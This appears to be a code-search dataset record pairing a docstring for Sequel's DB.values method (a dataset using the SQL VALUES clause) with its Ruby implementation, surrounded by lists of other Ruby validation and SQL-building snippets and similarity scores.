"def matches_type? identifier, type\n case type\n\n # Simple setter method,\n # as in this.setTitle('Projects')\n when \"setter\"\n /\\Aset(?=[[:upper:]])/.match(identifier).present?\n\n # Introduces translation scope,\n # as in Ext.define(\"ads.locale.en.view.project.List\", { ... })\n when \"scope\"\n %w[define create].include? identifier\n\n # First method in chained call,\n # as lookupReference in this.lookupReference('editButton').setText('Edit')\n when \"finder\"\n %w[lookupReference queryById].include? identifier\n\n # Attribute,\n # as in format: 'd-m-Y'\n when \"attribute\"\n not %w[override].include? identifier\n\n # Data compound attribute,\n # as in data: [ { \"name\" : \"Succeed\", \"value\": \"succeed\"} ]\n when \"data\"\n %w[data].include? identifier\n\n when \"any\"\n true\n else\n false\n end\n end",
"def valid_type?(type)\n super || extended_types.include?(type)\n end",
"def is_valid_attr_name?(attr_name)\n return false if attr_name.nil? or attr_name == \"\" or !attr_name.include?(':')\n \n column_family, column = attr_name.split(':', 2)\n return column_families.include?(column_family)\n end",
"def has_type?\n ! type.nil?\n end",
"def valid?(name = nil, type = nil)\n return valids(name, type).size == find(name, type).size\n end",
"def has_datatype?\n !datatype.nil?\n end",
"def valid_type?\n %w[ip domain].include? type\n end",
"def allowed?(val)\n case ftype\n when 'string', 'url'\n val.is_a?(String)\n when 'number'\n val.is_a?(Integer) || val.is_a?(Float)\n when 'sample'\n allowable_field_types.collect { |aft| aft.sample_type.id }.member? val.sample_type_id\n when 'item'\n allowable_field_types.collect { |aft| aft.object_type.id }.member? val.object_type_id\n end\n end",
"def valid_table_name?(name)\r\n name =~ /^([a-z]|[A-Z]){1}([a-z]|[A-Z]|\\d){2,62}$/\r\n end",
"def supports?(url)\n return @service_types.member?(url)\n end",
"def valid_table_name?(name)\n name =~ /^([a-z]|[A-Z]){1}([a-z]|[A-Z]|\\d){2,62}$/\n end",
"def type?(type)\n type = type.to_str\n\n types = param('TYPE')\n\n if types\n types = types.detect { |t| Vpim::Methods.casecmp?(t, type) }\n end\n end",
"def valid?\n %w(none set).include?(db.type(id))\n end",
"def auto_validate_types?\n @auto_validate_types\n end",
"def ensure_identified_name_type_matches\n return if name.blank? || non_conforming?\n return unless (identified_name_type = Names::IdentifyNameType[name])\n\n return if is_a?(identified_name_type)\n return if is_a?(SubtribeName) && Subtribe.valid_subtribe_name?(name)\n\n errors.add :name, <<~STR.squish\n type (`#{self.class.name}`) and identified name type (`#{identified_name_type.name}`) must match.\n Flag name as 'Non-conforming' to bypass this validation.\n STR\n end",
"def pbHasType?(type)\n if type.is_a?(String) || type.is_a?(Symbol)\n type = getID(PBTypes,type)\n end\n for pokemon in $Trainer.pokemonParty\n return true if pokemon.hasType?(type)\n end\n return false\nend",
"def is_name_value?(val)\n val.is_a?(String) || val.is_a?(Symbol)\n end",
"def contain?(name)\n conv_name = name.to_s.downcase.to_sym\n conversions.key?(conv_name)\n end",
"def has_attribute?(attr_name)\n attribute_types.key?(attr_name.to_s)\n end",
"def is_ustring?(); @type == GRT_USTRING; end",
"def knows?(name)\n false\n end",
"def has_symbol?(sym)\n\t\t\t@parameters.key?(sym) or @species.key?(sym)\n\t\tend",
"def is_valid?(types, item)\n types.each do |type|\n if type == :ipv4\n return true if ipv4?(item)\n elsif type == :domain\n return true if domain?(item)\n elsif type == :hash\n return true if hash?(item)\n elsif type == :classification\n return true if classification?(item)\n elsif type == :tag\n return true if tag?(item)\n elsif type == :bool\n return true if bool?(item)\n elsif type == :ssl_field\n return true if ssl_field?(item)\n elsif type == :whois_field\n return true if whois_field?(item)\n elsif type == :tracker_type\n return true if tracker_type?(item)\n end\n end\n return false\n end",
"def has_a_minimum_one_string_type?\n self.index_table_fields.map(&:field_name).each do |field_name|\n self.table_name.constantize.columns.each {|elt| return true if (elt.name == field_name && (elt.type == :string || elt.type == :text))} \n end\n return false\n end",
"def named?\n id.kind_of?(String)\n end",
"def string_class_name?(class_pair)\n class_pair.children[1].str_type?\n end",
"def supports_schema_parsing?\n respond_to?(:schema_parse_table, true)\n end",
"def validate_field_types\n database_field_names.each do |field|\n field_info = self.class.get_table_info.select {|hash| hash[\"name\"] == field}.first\n check_field_value_matches_data_type(field_info, field) \n end\n @errors\n end",
"def is_valid_name?(name)\n return name.class == String && name.match(/[a-zA-Z]+?/)\n end",
"def is_typed?(key, type)\n return (!datas.has_key?(key) or datas[key].kind_of?(type))\n end",
"def valid_attribute_type( attroid )\n\t\treturn self.valid_attribute_types.find {|attr_type| attr_type.valid_name?(attroid) }\n\tend",
"def gem_available?(name)\n Gem::Specification.find_by_name(name)\nrescue Gem::LoadError\n false\nend",
"def _has_attribute?(attr_name)\n attribute_types.key?(attr_name)\n end",
"def _has_attribute?(attr_name)\n attribute_types.key?(attr_name)\n end",
"def recognized?\n return !self.etypes.empty?\n end",
"def string?\n data_type == String\n end",
"def valid_search_type?(value)\n %w(characters).include? value\n end",
"def of_kind?(attribute, type = :invalid)\n attribute, type = normalize_arguments(attribute, type)\n\n if type.is_a? Symbol\n !where(attribute, type).empty?\n else\n messages_for(attribute).include?(type)\n end\n end",
"def respond_to?(symbol)\n @curl.respond_to?(symbol)\n end",
"def event_type_supported?\n return false if type = params[:type]\n SlackEvents.has_key?(type)\n end",
"def key?(name)\n ::Kernel.raise TypeError, \"name #{name} must convert to_sym\" unless name and name.respond_to?(:to_sym)\n @locals.has_key?(name.to_sym)\n end",
"def ltype?\n return true\n end",
"def type_of?(type)\n type.raw_type == raw_type\n end",
"def respond_to?( sym )\n\t\treturn true if @struct.member?( sym.to_s.sub(/(=|\\?)$/, '') )\n\t\tsuper\n\tend",
"def is_local_datastore?(name)\n !!name.match(/local-storage-\\d+|DAS\\d+/)\n end",
"def item_type_valid?\n res = item_type.safe_constantize\n errors.add :item_type, \"is not a valid class name: '#{item_type}'\" unless res\n end",
"def valid_type_for_datastream?(dsid, type)\n true\n end",
"def present?(key)\n types.key?(key.class)\n end",
"def object_storage?\n name.include?(\"ObjectStorage\")\n end",
"def requires_placeholder_type_specifiers?\n true\n end",
"def kind_of?(p0) end",
"def uses_record_type?\n list_class.attribute_names.include?('record_type')\n end",
"def valid_argument? name, type\n if name.nil? || name.empty? || name == type\n shell.say(\"ERROR: Invalid/missing argument.\") and false\n else\n true\n end\n end",
"def data_frame?(frame_type)\n %i(text binary).include?(frame_type)\n end",
"def storage_exists?(storage_name)\n statement = <<-EOS.compress_lines\n SELECT COUNT(*)\n FROM `information_schema`.`columns`\n WHERE `table_schema` = ? AND `table_name` = ?\n EOS\n\n query(statement, db_name, storage_name).first > 0\n end",
"def check_column column, table, col_types\n unless column.is_a? Symbol\n raise ArgumentError, \"#{column.inspect} not a Symbol\"\n end\n unless col_types[column]\n raise ArgumentError, \"#{column.inspect} is not a column in #{table}\"\n end\n end"
] |
[
"0.71684283",
"0.71072584",
"0.6997427",
"0.6890807",
"0.6834597",
"0.66947275",
"0.6680831",
"0.6505652",
"0.63379216",
"0.6317333",
"0.62921417",
"0.6221379",
"0.6195991",
"0.6191106",
"0.61868876",
"0.6179928",
"0.61571366",
"0.6141454",
"0.6141323",
"0.6129752",
"0.6092302",
"0.6017458",
"0.59997916",
"0.5994679",
"0.59903735",
"0.59760636",
"0.59741515",
"0.59565336",
"0.5953796",
"0.59319353",
"0.59204674",
"0.58828133",
"0.5871549",
"0.5865551",
"0.58620965",
"0.5851544",
"0.5817555",
"0.58045423",
"0.57888186",
"0.5763739",
"0.5743112",
"0.5723348",
"0.5722334",
"0.57179356",
"0.57107025",
"0.5688182",
"0.568647",
"0.5685024",
"0.56823844",
"0.56423616",
"0.5627312",
"0.56210685",
"0.56181437",
"0.5612063",
"0.5611495",
"0.561106",
"0.5605921",
"0.5605456",
"0.560519",
"0.5590214",
"0.5586232",
"0.55796146",
"0.5578201",
"0.5569207",
"0.55664015",
"0.5557887",
"0.55561584",
"0.555513",
"0.555507",
"0.5549126",
"0.5537519",
"0.55317575",
"0.552978",
"0.55270416",
"0.5526215",
"0.5519583",
"0.55113536",
"0.55113536",
"0.5508434",
"0.55008674",
"0.5499964",
"0.548827",
"0.54878455",
"0.54852074",
"0.5481428",
"0.5480955",
"0.54733616",
"0.54608077",
"0.54529756",
"0.5451615",
"0.54483175",
"0.54335773",
"0.5421639",
"0.5419926",
"0.5416991",
"0.5413296",
"0.5411062",
"0.541058",
"0.54085493",
"0.54057544"
] |
0.67410797
|
5
|
Creates a dataset that uses the VALUES clause:

  DB.values([[1, 2], [3, 4]])
  # VALUES ((1, 2), (3, 4))

  DB.values([[1, 2], [3, 4]]).order(:column2).limit(1, 1)
  # VALUES ((1, 2), (3, 4)) ORDER BY column2 LIMIT 1 OFFSET 1
|
def values(v)
raise Error, "Cannot provide an empty array for values" if v.empty?
@default_dataset.clone(:values=>v)
end
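A short sketch of using such a dataset, assuming a Sequel PostgreSQL connection (PostgreSQL names the generated columns column1, column2, ...):

  DB.values([[1, 2], [3, 4]]).all
  # => [{:column1=>1, :column2=>2}, {:column1=>3, :column2=>4}]

  DB.values([])
  # raises Sequel::Error, per the guard clause above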
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def select_values_sql(sql)\n sql << \"VALUES \"\n expression_list_append(sql, opts[:values])\n end",
"def test_values\n value = nil\n assert_nothing_raised do\n value = ActiveRecord::Base.connection.send(:select_rows, \"VALUES('ur', 'doin', 'it', 'right')\")\n end\n assert_equal [['ur', 'doin', 'it', 'right']], value\n end",
"def insert(column, values)\n values = Array(values)\n unless values.nil? or values.empty?\n @data.expand(values.count, column)\n [@data.rows_count, values.count].max.times { |index| (@data.values[index] ||= []).insert column, values[index] }\n end\n self\n end",
"def insert_many( sql, values, _options = {}, *args ) # :nodoc:\n number_of_inserts = 0\n\n base_sql, post_sql = case sql\n when String\n [sql, '']\n when Array\n [sql.shift, sql.join( ' ' )]\n end\n\n value_sets = ::ActiveRecord::Import::ValueSetsRecordsParser.parse(values,\n max_records: SQLITE_LIMIT_COMPOUND_SELECT)\n\n transaction(requires_new: true) do\n value_sets.each do |value_set|\n number_of_inserts += 1\n sql2insert = base_sql + value_set.join( ',' ) + post_sql\n insert( sql2insert, *args )\n end\n end\n\n ActiveRecord::Import::Result.new([], number_of_inserts, [], [])\n end",
"def insert_sql(*values)\n if values.empty?\n insert_default_values_sql\n else\n values = values[0] if values.size == 1\n \n # if hash or array with keys we need to transform the values\n if @transform && (values.is_a?(Hash) || (values.is_a?(Array) && values.keys))\n values = transform_save(values)\n end\n from = source_list(@opts[:from])\n\n case values\n when Array\n if values.empty?\n insert_default_values_sql\n else\n \"INSERT INTO #{from} VALUES #{literal(values)}\"\n end\n when Hash\n if values.empty?\n insert_default_values_sql\n else\n fl, vl = [], []\n values.each {|k, v| fl << literal(k.is_a?(String) ? k.to_sym : k); vl << literal(v)}\n \"INSERT INTO #{from} (#{fl.join(COMMA_SEPARATOR)}) VALUES (#{vl.join(COMMA_SEPARATOR)})\"\n end\n when Dataset\n \"INSERT INTO #{from} #{literal(values)}\"\n else\n if values.respond_to?(:values)\n insert_sql(values.values)\n else\n \"INSERT INTO #{from} VALUES (#{literal(values)})\"\n end\n end\n end\n end",
"def insert_select_sql(*values)\n ds = opts[:returning] ? self : returning\n ds.insert_sql(*values)\n end",
"def insert_select_sql(*values)\n ds = opts[:returning] ? self : returning\n ds.insert_sql(*values)\n end",
"def insert_select_sql(*values)\n ds = opts[:returning] ? self : returning\n ds.insert_sql(*values)\n end",
"def insert_select(*values)\n unless @opts[:disable_insert_returning]\n ds = opts[:returning] ? self : returning\n ds.insert(*values){|r| return r}\n end\n end",
"def insert(*values)\n if @opts[:sql] || @opts[:returning]\n super\n else\n returning(insert_pk).insert(*values){|r| return r.values.first}\n end\n end",
"def multi_insert_sql_strategy\n :values\n end",
"def dataset\n DB[SQL, from: from_truncated, to: to_truncated, tick: tick]\n end",
"def add_data_values\n # remove any previous accepted values so that we can keep a track of what has been updated\n sqlclean = \"select clear_datacolumn_accepted_values(#{id})\"\n\n datatype = Datatypehelper.find_by_name(import_data_type)\n\n # I would like to change this so that the SQL is in one function but it wasn't working\n # TODO: I will look at this again - SR\n if datatype.name == 'text'\n sql = \"select accept_text_datacolumn_values(#{id})\"\n else\n dataset = Dataset.find(dataset_id)\n comment = ''\n comment = dataset.title unless dataset.nil?\n sql = \"select accept_datacolumn_values(#{datatype.id}, #{id}, #{datagroup_id}, '#{comment}')\"\n end\n\n begin\n connection = ActiveRecord::Base.connection()\n connection.begin_db_transaction\n connection.execute(sqlclean)\n connection.execute(sql)\n\n connection.commit_db_transaction\n rescue StandardError\n connection.rollback_db_transaction\n raise\n end\n end",
"def insert(values)\n primary_key_value = nil\n\n if primary_key && Hash === values\n primary_key_value = values[values.keys.find { |k|\n k.name == primary_key\n }]\n\n if !primary_key_value && connection.prefetch_primary_key?(klass.table_name)\n primary_key_value = connection.next_sequence_value(klass.sequence_name)\n values[klass.arel_table[klass.primary_key]] = primary_key_value\n end\n end\n\n im = arel.create_insert\n\n # ****** BEGIN PARTITIONED PATCH ******\n actual_arel_table = @klass.dynamic_arel_table(Hash[*values.map{|k,v| [k.name,v]}.flatten]) if @klass.respond_to?(:dynamic_arel_table)\n actual_arel_table = @table unless actual_arel_table\n # Original line:\n # im.into @table\n im.into actual_arel_table\n # ****** END PARTITIONED PATCH ******\n\n conn = @klass.connection\n\n substitutes = values.sort_by { |arel_attr,_| arel_attr.name }\n binds = substitutes.map do |arel_attr, value|\n [@klass.columns_hash[arel_attr.name], value]\n end\n\n substitutes.each_with_index do |tuple, i|\n tuple[1] = conn.substitute_at(binds[i][0], i)\n end\n\n if values.empty? # empty insert\n im.values = Arel.sql(connection.empty_insert_statement_value)\n else\n im.insert substitutes\n end\n\n conn.insert(\n im,\n 'SQL',\n primary_key,\n primary_key_value,\n nil,\n binds)\n end",
"def insert_select(*values)\n with_sql_first(insert_select_sql(*values))\n end",
"def generate_dataset\n return nil if query.nil?\n # execute the query\n data = Array ActiveRecord::Base.connection.execute(query)\n return [] if data.empty?\n # Convert the query into an easy to read format\n @dataset = [data.first.keys]+data.map{|dd|dd.values}\n return @dataset\n end",
"def insert(row, values)\n values = Array(values)\n unless values.empty?\n @data.expand(row, values.count)\n @data.values.insert row, Array.new([@data.columns_count, values.count].max) { |index| values[index] }\n end\n self\n end",
"def push(values)\n values = Array(values)\n unless values.empty?\n @data.expand(values.count, @data.columns_count)\n [@data.rows_count, values.count].max.times { |index| (@data.values[index] ||= []).push values[index] }\n end\n self\n end",
"def sql_literal(*)\n @dataset.sql\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n #We need comma separated values for our SQL statement. Let's join this array into a string:\n values.join(\", \")\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |column_name|\n values << \"'#{send(column_name)}'\" unless send(column_name).nil?\n end \n #The above code, however, will result in a values array. We need comma separated values for our SQL statement. Let's join this array into a string:\n values.join(\", \")\n end",
"def push(values)\n values = Array(values)\n unless values.empty?\n @data.expand(@data.rows_count, values.count)\n @data.values.push Array.new([@data.columns_count, values.count].max) { |index| values[index] }\n end\n self\n end",
"def insert_many( sql, values, *args ) # :nodoc:\n # the number of inserts default\n number_of_inserts = 0\n \n base_sql,post_sql = if sql.is_a?( String )\n [ sql, '' ]\n elsif sql.is_a?( Array )\n [ sql.shift, sql.join( ' ' ) ]\n end\n \n sql_size = QUERY_OVERHEAD + base_sql.size + post_sql.size \n\n # the number of bytes the requested insert statement values will take up\n values_in_bytes = self.class.sum_sizes( *values )\n \n # the number of bytes (commas) it will take to comma separate our values\n comma_separated_bytes = values.size-1\n \n # the total number of bytes required if this statement is one statement\n total_bytes = sql_size + values_in_bytes + comma_separated_bytes\n \n max = max_allowed_packet\n \n # if we can insert it all as one statement\n if NO_MAX_PACKET == max or total_bytes < max\n number_of_inserts += 1\n sql2insert = base_sql + values.join( ',' ) + post_sql\n insert( sql2insert, *args )\n else\n value_sets = self.class.get_insert_value_sets( values, sql_size, max )\n value_sets.each do |values|\n number_of_inserts += 1\n sql2insert = base_sql + values.join( ',' ) + post_sql\n insert( sql2insert, *args )\n end\n end \n\n number_of_inserts\n end",
"def insert values\n if $VERBOSE\n warn <<-eowarn\ninsert (#{caller.first}) is deprecated and will be removed in ARel 3.0.0. Please\nswitch to `compile_insert`\n eowarn\n end\n @engine.connection.insert compile_insert(values).to_sql\n end",
"def values(ids, common_value)\n common_values = [common_value] * ids.length\n convert_to_sql(ids.zip(common_values).each(&:flatten!))\n end",
"def multiple_value_sets_insert_sql(table_name, column_names, options) # :nodoc:\n \"INSERT #{options[:ignore] ? 'IGNORE ':''}INTO #{table_name} (#{column_names.join(',')}) VALUES \"\n end",
"def build values, options\n adapter_class.new(values, options).execute\n end",
"def _import(columns, values, opts=OPTS)\n if @opts[:returning]\n # no transaction: our multi_insert_sql_strategy should guarantee\n # that there's only ever a single statement.\n sql = multi_insert_sql(columns, values)[0]\n returning_fetch_rows(sql).map{|v| v.length == 1 ? v.values.first : v}\n elsif opts[:return] == :primary_key\n returning(insert_pk)._import(columns, values, opts)\n else\n super\n end\n end",
"def multi_insert_sql(columns, values)\n values = values.map {|r| \"SELECT #{expression_list(r)}\" }.join(\" UNION ALL \")\n [\"#{insert_sql_base}#{source_list(@opts[:from])} (#{identifier_list(columns)}) #{values}\"]\n end",
"def multiple(sql, values = [])\n r = $db.exec_params(sql, values)\n return [] if r.ntuples == 0\n r.map { |row| convert_to_ruby_types(row) }\nend",
"def insert_record(table, values)\n execute table_insert_query(table, values)\n end",
"def insert_sql(*values)\n if values.size == 1 && (v = values[0]).is_a?(Sequel::Model) && !v.respond_to?(:sql_literal_append)\n Sequel::Deprecation.deprecate(\"Passing Sequel::Model instance argument to Sequel::Dataset#insert\", \"Pass model_instance.values or model_instance.to_hash as the argument instead\")\n super(v.to_hash)\n else\n super\n end\n end",
"def prepare_explicit_statement(ds, type, vals=OPTS)\n f = ds.opts[:from]\n meth = type == :insert_select ? :returning : :select\n s = ds.opts[meth]\n if f && f.length == 1 && !ds.opts[:join] && (!s || s.empty?)\n ds = ds.send(meth, *columns.map{|c| Sequel.identifier(c)})\n end \n \n prepare_statement(ds, type, vals)\n end",
"def multi_insert_sql(columns, values)\n table = quote_identifier(@opts[:from].first)\n columns = literal(columns)\n values.map do |r|\n \"INSERT INTO #{table} #{columns} VALUES #{literal(r)}\"\n end\n end",
"def insert_facet_series(table, type, select = 'facet_id, series_id')\n $db.execute <<-SQL\n INSERT INTO destination.#{table}\n SELECT #{select}\n FROM facet_series\n WHERE type = '#{type}';\n SQL\nend",
"def insert values\n im = InsertManager.new @engine\n im.insert values\n @engine.connection.insert im.to_sql\n end",
"def to_sql\n sql = [\"select\"]\n select_values << \"*\" if select_values.empty?\n\n sql << select_values.uniq.join(\", \")\n\n sql << \"from #{build_series_name}\"\n\n sql << \"where #{where_values.join(\" and \")}\" unless where_values.empty?\n\n unless group_values.empty? && time_value.nil?\n group_fields = (time_value.nil? ? [] : [\"time(\" + @values[:time] + \")\"]) + group_values\n group_fields.uniq!\n sql << \"group by #{group_fields.join(\", \")}\"\n end\n\n sql << \"fill(#{fill_value})\" unless fill_value.nil?\n\n sql << \"order by #{order_values.uniq.join(\",\")}\" unless order_values.empty?\n\n sql << \"limit #{limit_value}\" unless limit_value.nil?\n sql << \"offset #{offset_value}\" unless offset_value.nil?\n sql << \"slimit #{slimit_value}\" unless slimit_value.nil?\n sql << \"soffset #{soffset_value}\" unless soffset_value.nil?\n sql << \"TZ('#{timezone_value}')\" unless timezone_value.blank?\n sql.join \" \"\n end",
"def sql_literal_append(ds, sql)\n check_columns!\n sql << 'ROW'\n ds.literal_append(sql, values_at(*columns))\n if db_type\n sql << '::'\n ds.quote_schema_table_append(sql, db_type)\n end\n end",
"def insert(*values)\n execute_dui(insert_sql(*values)){|c| return c.last_id}\n end",
"def returning(*values)\n if values.empty?\n cached_dataset(:_returning_ds) do\n raise Error, \"RETURNING is not supported on #{db.database_type}\" unless supports_returning?(:insert)\n clone(:returning=>EMPTY_ARRAY)\n end\n else\n raise Error, \"RETURNING is not supported on #{db.database_type}\" unless supports_returning?(:insert)\n clone(:returning=>values.freeze)\n end\n end",
"def select_sql\n return super unless o = @opts[:offset]\n raise(Error, \"#{db.database_type} requires an order be provided if using an offset\") unless order = @opts[:order]\n dsa1 = dataset_alias(1)\n rn = row_number_column\n sql = @opts[:append_sql] || ''\n subselect_sql_append(sql, unlimited.\n unordered.\n select_append{ROW_NUMBER(:over, :order=>order){}.as(rn)}.\n from_self(:alias=>dsa1).\n limit(@opts[:limit]).\n where(SQL::Identifier.new(rn) > o).\n order(rn))\n sql\n end",
"def insert(column, value = :no_value)\n @columns << column\n @values << Translate.escape_sql(value) unless value == :no_value\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \") # join values array into a string separated by comma's\n end",
"def to_prepared_statement(type, values=nil, opts=OPTS)\n mods = opts[:extend] || []\n mods += [PreparedStatementMethods]\n\n bind.\n clone(:prepared_statement_name=>opts[:name], :prepared_type=>type, :prepared_modify_values=>values, :orig_dataset=>self, :no_cache_sql=>true, :prepared_args=>@opts[:prepared_args]||[]).\n with_extend(*mods)\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\n\n # Let's iterate over the column names stored in #column_names and use the #send method with each individual column name to invoke the method by that same name and capture the return value:\n # values = []\n # self.class.column_names.each do |col_name|\n # values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n # end\n # Here, we push the return value of invoking a method via the #send method, unless that value is #nil (as it would be for the id method before a record is saved, for instance).\n # Notice that we are wrapping the return value in a string. That is because we are trying to craft #a string of SQL. Also notice that each individual value will be enclosed in single quotes, ' ', #inside that string. That is because the final SQL string will need to look like this:\n\n # INSERT INTO songs (name, album)\n # VALUES 'Hello', '25';\n # SQL expects us to pass in each column value in single quotes.\n # The above code, however, will result in a values array\n # [\"'the name of the song'\", \"'the album of the song'\"]\n # We need comma separated values for our SQL statement. Let's join this array into a string:\n # values.join(\", \")\n end",
"def convert_to_sql(array_of_values)\n array_of_values.inspect[1...-1].gsub('[', '(').gsub(']', ')')\n end",
"def insert(*values)\n if @opts[:returning]\n # Already know which columns to return, let the standard code handle it\n super\n elsif @opts[:sql] || @opts[:disable_insert_returning]\n # Raw SQL used or RETURNING disabled, just use the default behavior\n # and return nil since sequence is not known.\n super\n nil\n else\n # Force the use of RETURNING with the primary key value,\n # unless it has been disabled.\n returning(*insert_pk).insert(*values){|r| return r.values.first}\n end\n end",
"def flatten_to_sql(*values)\n flatten_safely(values) do |value|\n value = yield value if block_given?\n to_arel_sql(value)\n end\n end",
"def dynamic_values\n if @dynamic_values.blank?\n\n if self.column.blank?\n raise \"dynamic_values column not defined for filter_param_id = #{self.id}\"\n end\n\n query_result = self.dynamic_values_query.try(:query_result, nil, nil,\n :sample_option => ::Query::Sample::REAL,\n :sql_string => \"SELECT `#{self.column}` FROM {table_name}\"\n )\n result_set = query_result.try(:result_set)\n if !result_set.nil?\n @dynamic_values = result_set.try(:results_array).collect do |row|\n result_set.value_at(row, self.column)\n end\n end\n end\n\n @dynamic_values ||= []\n end",
"def select_values(sql, name = nil)\n result = select_rows(sql, name)\n result.map { |v| v[0] }\n end",
"def select_values values\n return unless values\n values.each do |val|\n row = @list.index val\n add_row_selection_interval row, row unless row.nil?\n end\n end",
"def <<(sql); execute((Array === sql) ? sql.to_sql : sql); end",
"def execute(*values)\n IBM_DB.execute(@stmt, values)\n end",
"def insert(*values)\n if @opts[:returning]\n # Already know which columns to return, let the standard code handle it\n super\n elsif @opts[:sql] || @opts[:disable_insert_returning]\n # Raw SQL used or RETURNING disabled, just use the default behavior\n # and return nil since sequence is not known.\n super\n nil\n else\n # Force the use of RETURNING with the primary key value,\n # unless it has been disabled.\n returning(insert_pk).insert(*values){|r| return r.values.first}\n end\n end",
"def select_sql\n return super unless o = @opts[:offset]\n raise(Error, 'MSSQL requires an order be provided if using an offset') unless order = @opts[:order]\n dsa1 = dataset_alias(1)\n dsa2 = dataset_alias(2)\n rn = row_number_column\n unlimited.\n unordered.\n from_self(:alias=>dsa2).\n select{[WILDCARD, ROW_NUMBER(:over, :order=>order){}.as(rn)]}.\n from_self(:alias=>dsa1).\n limit(@opts[:limit]).\n where(rn > o).\n select_sql\n end",
"def insert!(*rows)\n Mao.sql(with_options(:insert => rows.flatten).sql) do |pg_result|\n if @options[:returning]\n pg_result.map {|result| Mao.normalize_result(result, @col_types)}\n else\n pg_result.cmd_tuples\n end\n end\n end",
"def insert_returning_columns(ds)\n return unless ds.supports_returning?(:insert)\n return unless values = ds.opts[:select]\n\n values = values.map{|v| ds.unqualified_column_for(v)}\n if values.all?\n values\n end\n end",
"def _insert_raw(ds)\n ds.insert(_insert_values)\n end",
"def _insert_raw(ds)\n ds.insert(_insert_values)\n end",
"def _insert_raw(ds)\n if use_prepared_statements_for?(:insert)\n _set_prepared_statement_server(model.send(:prepared_insert, @values.keys)).call(@values)\n else\n super\n end\n end",
"def sqlite3_insert(table_name, values, mem_db)\n @assert.check_table_name(table_name, @dbh)\n\n table_ast = Hash.new\n table_ast = @dbm.get_table_ast(table_name)\n # TODO: Each value element type. All types are acceptable.\n # If hash, {key:value} needs to be {column_name:value}.\n\n # This hash holds a map of column position in the table\n index_to_column = Hash.new\n # Since the position of column in a table is static on\n # creation, we can keep a track of each column position\n # simple by assigning an index to each (A.K.A. indexing).\n tb_index = 0\n table_ast.each {|col_name, col_info|\n index_to_column[tb_index] = [col_name, col_info]\n tb_index += 1\n }\n\n @assert.check_class(values.class, Array, @dbh)\n vl_index = 0\n column_to_value = Hash.new\n values.each {|value|\n if value.class == Hash\n status = value.size == 1\n error_msg = \"Error: Size of hash for insert value cannot exeed 1.\\n\"\n error_msg += \"#{value} has size #{value.size}\"\n @assert.default_error_check(status, error_msg, @dbh)\n \n # Extract user input value\n col_name = value.keys[0]\n status = table_ast.has_key?(col_name.to_s)\n error_msg = \"Column #{col_name.to_s} does not exist in table #{table_name}.\\n\"\n error_msg += @dbm.get_table_schema(table_name)\n @assert.default_error_check(status, error_msg, @dbh)\n column_to_value[col_name.to_s] = value[col_name]\n else\n # Compare input value type with table column type\n cur_column_in_table = index_to_column[vl_index]\n @assert.check_column_value(cur_column_in_table, value, mem_db[table_name], @dbh)\n col_name = cur_column_in_table[0]\n column_to_value[col_name] = value\n end\n\n vl_index += 1\n }\n\n insert_query = \"INSERT INTO #{table_name} (\"\n column_to_value.each_key {|col_name|\n insert_query += \"#{col_name},\"\n }\n insert_query.chomp!(',')\n insert_query += \") VALUES (\"\n column_to_value.each_value {|value|\n if value.class == String\n insert_query += \"'#{value}',\"\n else\n insert_query += \"#{value},\"\n end\n }\n insert_query.chomp!(',')\n insert_query += ');'\n\n @dbh.execute(insert_query)\n return insert_query + \"\\n\"\n end",
"def prepare(type, name=nil, *values)\n ps = to_prepared_statement(type, values)\n ps.extend(JDBC::Dataset::PreparedStatementMethods)\n ps.extend(::Sequel::Fdbsql::DatasetMethods::PreparedStatementMethods)\n if name\n ps.prepared_statement_name = name\n db.set_prepared_statement(name, ps)\n end\n ps\n end",
"def values_for_insert\r\n values = []\r\n self.class.column_names.each do |col_name|\r\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\r\n end\r\n values.join(\", \")\r\nend",
"def GetValueId(db, valueTable, idColumn, valueColumn, value)\n\tquery = db.execute(\"SELECT \" + idColumn + \" FROM \" + valueTable + \" WHERE \" + valueColumn + \" = ?;\",[value])\n\t\n\tif (query.length == 1)\n\t\treturn query\n\telse\n\t\tdb.execute(\"INSERT INTO \" + valueTable + \"(\" + valueColumn + \") VALUES (?);\", [value])\n\t\treturn db.execute(\"SELECT \" + idColumn + \" FROM \" + valueTable + \" WHERE \" + valueColumn + \" = ?;\",[value])\n\tend\nend",
"def single_value(sql, opts=OPTS)\n _execute(sql, opts){|conn| log_connection_yield(sql, conn){conn.first_value_from(sql)}}\n end",
"def update_sql(values = {}, opts = nil, &block)\n opts = opts ? @opts.merge(opts) : @opts\n\n if opts[:group]\n raise Error::InvalidOperation, \"A grouped dataset cannot be updated\"\n elsif (opts[:from].size > 1) or opts[:join]\n raise Error::InvalidOperation, \"A joined dataset cannot be updated\"\n end\n \n sql = \"UPDATE #{source_list(@opts[:from])} SET \"\n if block\n sql << block.to_sql(self, :comma_separated => true)\n else\n set = if values.is_a?(Hash)\n # get values from hash\n values = transform_save(values) if @transform\n values.map do |k, v|\n # convert string key into symbol\n k = k.to_sym if String === k\n \"#{literal(k)} = #{literal(v)}\"\n end.join(COMMA_SEPARATOR)\n else\n # copy values verbatim\n values\n end\n sql << set\n end\n if where = opts[:where]\n sql << \" WHERE #{literal(where)}\"\n end\n\n sql\n end",
"def build_insert_stmt(dynamo_field_value)\n values = []\n insert_stmt_fields = DynamoFieldValue.column_names.reject{ |field| field == 'id'}\n insert_stmt_fields.each do |field_name|\n # We need to tinker with fields based on their type for sql syntax purposes\n temp_val = dynamo_field_value.send(field_name)\n temp_val = \"'#{temp_val}'\" if temp_val.class.to_s == \"String\" || temp_val.class.to_s == \"ActiveSupport::TimeWithZone\"\n temp_val = \"NULL\" if temp_val.nil?\n values << temp_val\n end\n \"(#{values.join(',')})\"\n end",
"def get_data sql\n #$log.debug \"SQL: #{sql} \"\n columns, *rows = @db.execute2(sql)\n #$log.debug \"XXX COLUMNS #{sql}, #{rows.count} \"\n content = rows\n return content\n end",
